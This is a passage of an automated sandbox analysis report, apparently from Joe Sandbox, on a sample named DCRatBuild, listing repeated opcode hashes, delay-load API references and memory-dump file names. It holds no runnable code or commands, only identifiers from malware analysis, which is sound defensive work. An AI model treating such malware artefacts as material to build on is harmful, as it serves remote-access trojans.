                                  • Opcode Fuzzy Hash: 3c7e06ff114ef4378eca8cf24fcdcdd21f845596d763b3232a57690efec76bb0
                                  • Instruction Fuzzy Hash: A3B012E136D3426C3108A24AAD12D36024DD4C3B14B30842AB50DD01C0D8405C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d5a912ae523fb24e5dc72698a45da1e495a979e1a9544a12f1a483dd8dc05a0f
                                  • Instruction ID: 84ea015a8b9d49cf8b9faf67ffe6e82db632adb2d9ea10049c6f2a9bd73ff842
                                  • Opcode Fuzzy Hash: d5a912ae523fb24e5dc72698a45da1e495a979e1a9544a12f1a483dd8dc05a0f
                                  • Instruction Fuzzy Hash: 3CB012F126D3426C3148A34ABD12D36024DD4C2B14B30452AB10DD01C0D8805C4C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 2461f886c29fabe298586b0e20a75711bb19aaf5bdc83b393e780f997810a8d3
                                  • Instruction ID: f6cbb9a296cdba326a0270630e554689fe7859adeefe77a498b56136399f2c88
                                  • Opcode Fuzzy Hash: 2461f886c29fabe298586b0e20a75711bb19aaf5bdc83b393e780f997810a8d3
                                  • Instruction Fuzzy Hash: 08B012E126C3426C3108A25AAD12D36028CD4C3B18730842AF50DD01C0D9405C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 541f2e38e963445ce6cfc6387c426c695387dd1c3f8a12de616fba0e6482282f
                                  • Instruction ID: 93fa96fb9fe12d5dfb5ac87fb4b27483bda21ea23d0ca73ca7c45679e1a7417e
                                  • Opcode Fuzzy Hash: 541f2e38e963445ce6cfc6387c426c695387dd1c3f8a12de616fba0e6482282f
                                  • Instruction Fuzzy Hash: ACB012E127D3426C3108A24AAD12D36028DE8C2B14B30442AB14DD01C0D8405C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: dcbabefd2ad8ca7ad66bfcd5db3ac69312226120a8e7d7414340d18a9dd08565
                                  • Instruction ID: 0391ad9e646a423e612981c584c0d6728eafb3f30ab6a221a9cc07555ccf0793
                                  • Opcode Fuzzy Hash: dcbabefd2ad8ca7ad66bfcd5db3ac69312226120a8e7d7414340d18a9dd08565
                                  • Instruction Fuzzy Hash: 6AB012F126C3426C310CA24AAE12D3602CCD4C2B18B30442AF00DD01C0D9405C0D1832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 0c58b65c7f8d0404303682f9bbf01a7288bc9a63fa10c4ae2e444ca984694ca0
                                  • Instruction ID: ce88bd913ec7dd2bd3e25ad0da7995000672f6daff07714d84c8fbfd2bff8292
                                  • Opcode Fuzzy Hash: 0c58b65c7f8d0404303682f9bbf01a7288bc9a63fa10c4ae2e444ca984694ca0
                                  • Instruction Fuzzy Hash: 33B012F126C341EC310CB20B6C02D3B028CD0C1B14330C12BF409C01C4D8448D0C4C32
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: c0fb82c3b3ed60751667f3b8ed7f24061ab03f3d7bdbe9b8356450e3c3ffbc70
                                  • Instruction ID: 52b4eac0cb4753ad993ccfcb695c87e714d652ab186076c119a775cba98f5b13
                                  • Opcode Fuzzy Hash: c0fb82c3b3ed60751667f3b8ed7f24061ab03f3d7bdbe9b8356450e3c3ffbc70
                                  • Instruction Fuzzy Hash: EBB012E126C341AC310CB60B6D02E3E028CE0C5B14330852BF009C01C4D8408C0D4832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 04278f547f00a0d36794675af59e8b0e07214c18116deb4e26770f97ea9a7de3
                                  • Instruction ID: 21ea5212bd82c549432efa1c34cd7ffca600631e6ff8530f827d2f8e79413200
                                  • Opcode Fuzzy Hash: 04278f547f00a0d36794675af59e8b0e07214c18116deb4e26770f97ea9a7de3
                                  • Instruction Fuzzy Hash: E7B012A537D34A7C320C52067C07D37021CE4C1B24330452AB009E00C0EE404C4D4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 9bda9f105c56db7d4c915c49a0061ce9e285d6d96a3f2d2f620b2dd12043b7ed
                                  • Instruction ID: 5e7e9f9d7f7d96fed2ea4a3853d7d562a45d7d02b3d9b226508a9f19efbaa16b
                                  • Opcode Fuzzy Hash: 9bda9f105c56db7d4c915c49a0061ce9e285d6d96a3f2d2f620b2dd12043b7ed
                                  • Instruction Fuzzy Hash: 02B012A537C3457C310C921A6D07F36025DF4C1B24330442AB00ED01C0EE404C0D4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 0f6d621a2587bd43bc479b9082d92e7b253c0d9efe5e76082155532824c094d1
                                  • Instruction ID: 883e99115923d96534966241d518b62487ce0912ec5dee464d77e194de31e2ad
                                  • Opcode Fuzzy Hash: 0f6d621a2587bd43bc479b9082d92e7b253c0d9efe5e76082155532824c094d1
                                  • Instruction Fuzzy Hash: 07B012A537D346BC310C920A6C07E3702ACE4C1B24330841AB40DD11C0EE404C0D4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: c4a7ff19d6eda3e0eae4e9face0b3e0be9ab948b9633bd937b1ddde3d7793b55
                                  • Instruction ID: 4fd9e0a871a6fd83b54c7fbf48c56af3792ca8561d49e7be190357d184035bbe
                                  • Opcode Fuzzy Hash: c4a7ff19d6eda3e0eae4e9face0b3e0be9ab948b9633bd937b1ddde3d7793b55
                                  • Instruction Fuzzy Hash: 70B012A537D3867C310C920A6D07E37025CE4C1B24330841AB10DD01C0EE404C0E4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: a65d815eca9012bc6c23c7884a012225f1ef9a3ddbb83211e6fcbec1f1fd8a9b
                                  • Instruction ID: fd4964cef1a39789007162438d350496fd332c914b81b0c8b30d6727c7bfcacf
                                  • Opcode Fuzzy Hash: a65d815eca9012bc6c23c7884a012225f1ef9a3ddbb83211e6fcbec1f1fd8a9b
                                  • Instruction Fuzzy Hash: BFB012E12AC345AC710CB20B6D02E3A028CF0C1B14330413BF009C01C4D9408C0C4932
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDC36
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: f335ae0c926b47a353bcd9f01ac7f61769e0812c3a00f3a553479481afec9559
                                  • Instruction ID: 691bea5bfa8caab48aa7d1a6ad334c8dedb2fb95d0c52b3253073e411fbbddf9
                                  • Opcode Fuzzy Hash: f335ae0c926b47a353bcd9f01ac7f61769e0812c3a00f3a553479481afec9559
                                  • Instruction Fuzzy Hash: 33B012A526C345BC310C624ABF02C3A022CD2C1F54330461AB105E01C099C05C4C5432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDC36
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b66ae385346884c3c65e7b4e60740887bae53fe6fd0c044a110eb373784c6c4f
                                  • Instruction ID: 1e670f21cf7141f9b473fc83672315d1475010e01a6febe8f8e2ccff107902d2
                                  • Opcode Fuzzy Hash: b66ae385346884c3c65e7b4e60740887bae53fe6fd0c044a110eb373784c6c4f
                                  • Instruction Fuzzy Hash: 7CB012A527C341AC310CA24EAD02D3A026CE1C1F54330451BB109D02C0D9809C0C4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDC36
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b49e56a6fa12b7fb430f15183f888be5f8a17c0d962cacdeece13788d5fcdcd9
                                  • Instruction ID: 594ad00be487ca8e65113b58fc991c825679c8db508921158ee10ecc56035b45
                                  • Opcode Fuzzy Hash: b49e56a6fa12b7fb430f15183f888be5f8a17c0d962cacdeece13788d5fcdcd9
                                  • Instruction Fuzzy Hash: 45B012A526C341AC310CA24EAD02D3A026CD1C6F54330851AB509D02C0D9805C0C4432
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: e325a647b944d639cf4c244ab3b970aed03057ab97959089b7ffef1fb4ae5414
                                  • Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
                                  • Opcode Fuzzy Hash: e325a647b944d639cf4c244ab3b970aed03057ab97959089b7ffef1fb4ae5414
                                  • Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 8bacc2c903961316ba569b38cccee6efe9814ffce20610989eefcdb92207a8ae
